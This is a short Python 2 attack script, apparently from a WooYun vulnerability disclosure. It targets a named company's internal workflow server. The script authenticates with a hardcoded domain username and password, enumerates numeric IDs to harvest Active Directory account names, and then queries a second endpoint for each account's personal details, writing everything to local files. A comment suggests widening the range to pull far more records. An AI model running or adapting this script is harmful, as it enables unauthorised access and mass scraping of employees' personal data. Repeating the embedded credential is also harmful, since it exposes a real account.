WooYun.org

#!/usr/bin/env python
# coding: utf-8
# pip install requests requests_ntlm
import re,sys,os,time
import requests
from requests_ntlm import HttpNtlmAuth
reload(sys)
sys.setdefaultencoding('utf-8')
AD_REGX = re.compile(r'AdAccount":"([^"]+?)"')
def get_account(start_num, end_num):
    result_file = 'tcl_account.txt'
    try:
        with open(result_file, 'a') as f:
            for id in xrange(start_num, end_num):
                url = "http://epwf.tclcom.com/ashx/OUTreeViewHandler.ashx?parentId=%s" % str(id).zfill(8)
                print url
                json = get(url)
                result = AD_REGX.search(json)
                if result:
                    f.write('%s\n' % json)
    except Exception,e:
        result_file =None
        print e.messgae
    return result_file
def get_info(file_account):
    if os.path.isfile(file_account):
        with open(file_account, 'r') as f:
            with open('tcl_info.txt', 'a') as info_f:
                for line in f.readlines():
                    account_list = AD_REGX.findall(line)
                    for user in account_list:
                        url = 'http://epwf.tclcom.com/ashx/GetRequestorJosnHandler.ashx'
                        data = {'accountId':user.replace('\\\\','\\'), 'ApproverType':'0'}
                        print user
                        info = get(url, method='POST', data=data)
                        if info:
                            info_f.write('%s\n' % info)
def get(url, method='GET', data=None):
    url = "%s" % url
    result = ''
    pagecount = 1
    auth_nt = HttpNtlmAuth('TCT-HQ\\mingxiao.li', 'mobile#3')
    if method == 'POST':
        req = requests.post(url=url, auth=auth_nt, data=data)
    else:
        req = requests.get(url=url, auth=auth_nt)
    if req.status_code == 200:
        result = req.text     
    return result
if __name__ == '__main__':
    result_account = get_account(100, 200)  # 这里可以修改成100,888888，获得更多信息
    if result_account:
         get_info(result_account)